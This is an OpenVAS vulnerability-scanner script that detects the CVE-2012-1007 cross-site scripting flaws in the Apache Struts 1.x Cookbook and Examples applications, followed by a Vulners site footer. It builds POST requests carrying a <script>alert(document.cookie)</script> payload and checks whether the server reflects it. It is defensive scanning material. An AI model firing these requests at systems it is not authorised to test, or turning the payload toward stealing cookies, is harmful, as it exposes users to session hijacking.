##############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 5841 2017-04-03 12:46:41Z cfi $
#
# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
#
# Authors:
# Antu Sanadi <[email protected]>
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:apache:struts";
if(description)
{
script_id(802423);
script_version("$Revision: 5841 $");
script_bugtraq_id(51900);
script_cve_id("CVE-2012-1007");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"last_modification", value:"$Date: 2017-04-03 14:46:41 +0200 (Mon, 03 Apr 2017) $");
script_tag(name:"creation_date", value:"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)");
script_tag(name:"qod_type", value:"remote_vul");
script_name("Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities");
script_tag(name: "summary" , value:"This host is running Apache Struts and is
prone to multiple Cross-site scripting vulnerabilities.");
script_tag(name: "vuldetect" , value:"Send a crafted HTTP POST request
and check whether it is able to read cookie or not.");
script_tag(name: "insight" , value:"Multiple flaws due to an,
- Input passed via the 'message' parameter in 'processSimple.do' and
'processDyna.do' action is not properly verified before it is returned
to the user.
- Input passed via the 'name' and 'queryParam' parameter in
'/struts-examples/upload/upload-submit.do' action is not properly verified
before it is returned to the user.");
script_tag(name: "impact" , value:"Successful exploitation could allow an
attacker to execute arbitrary HTML code in a user's browser session in the
context of a vulnerable application.
Impact Level: Application.");
script_tag(name: "affected" , value:"Apache Struts (cookbook, examples) version 1.3.10 and prior.");
script_tag(name: "solution" , value:"Upgrade to Apache Struts version 2.3.3 or later,
For updates refer to http://struts.apache.org/download.cgi");
script_tag(name:"solution_type", value:"VendorFix");
script_xref(name : "URL" , value : "http://secpod.org/blog/?p=450");
script_xref(name : "URL" , value : "http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt");
script_category(ACT_ATTACK);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_dependencies("gb_apache_struts2_detection.nasl");
script_mandatory_keys("ApacheStruts/installed");
script_family("Web application abuses");
script_require_ports("Services/www", 8080);
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
asport = 0;
asreq = NULL;
asres = NULL;
asRes = NULL;
if(!asport = get_app_port(cpe:CPE)){
exit(0);
}
if(!dir = get_app_location(cpe:CPE, port:asport)){
exit(0);
}
host = http_host_name(port:asport);
## Make list index pages
foreach indexpage (make_list("/", "/welcome.do"))
{
## Send and Receive the response
asreq = http_get(item:string(dir, indexpage), port:asport);
if(!isnull(asreq))
{
asres = http_keepalive_send_recv(port:asport, data:asreq);
## Confirm the application Struts Cookbook
if(!isnull(asres) && ">Struts Cookbook<" >< asres)
{
## Construct the POST Attack for Struts Cookbook
postdata = "name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert" +
"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%" +
"27s+a+secret.+Nobody+knows+I%27m+here.";
## Construct the POST request Struts Cookbook
asReq = string("POST ", dir, "/processSimple.do HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"User-Agent: ", OPENVAS_HTTP_USER_AGENT, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(postdata), "\r\n",
"\r\n", postdata);
asRes = http_keepalive_send_recv(port:asport, data:asReq);
## Confirm the exploit
if(asRes =~ "HTTP/1\.. 200" && "<script>alert(document.cookie)</script>" >< asRes &&
">Simple ActionForm Example<" >< asRes)
{
security_message(asport);
exit(0);
}
}
## Confirm the application Struts Examples
if(!isnull(asres) && ">Struts Examples<" >< asres)
{
## Construct the POST data
postdata = '-----------------------------7559840272055538773136052934' +
'\r\nContent-Disposition: form-data; name="theText"\r\n\r\n' +
'\r\n-----------------------------7559840272055538773136052' +
'934\r\nContent-Disposition: form-data; name="theFile"; fil' +
'ename=""\r\nContent-Type: application/octet-stream\r\n\r\n' +
'\r\n-----------------------------7559840272055538773136052' +
'934\r\nContent-Disposition: form-data; name="filePath"\r\n' +
'\r\n<script>alert(document.cookie)</script>\r\n-----------' +
'------------------7559840272055538773136052934--\r\n';
## Construct the POST request
asReq = string("POST ", dir, "/upload/upload-submit.do?queryParam=Successful HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"User-Agent: ", OPENVAS_HTTP_USER_AGENT, "\r\n",
"Content-Type: multipart/form-data; boundary=---" +
"------------------------7559840272055538773136052934\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(postdata), "\r\n",
"\r\n", postdata);
asRes = http_keepalive_send_recv(port:asport, data:asReq);
## Confirm the exploit
if(asRes =~ "HTTP/1\.. 200" &&
"<script>alert(document.cookie)</script>" >< asRes &&
">File Upload Example<" >< asRes)
{
security_message(asport);
exit(0);
}
}
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation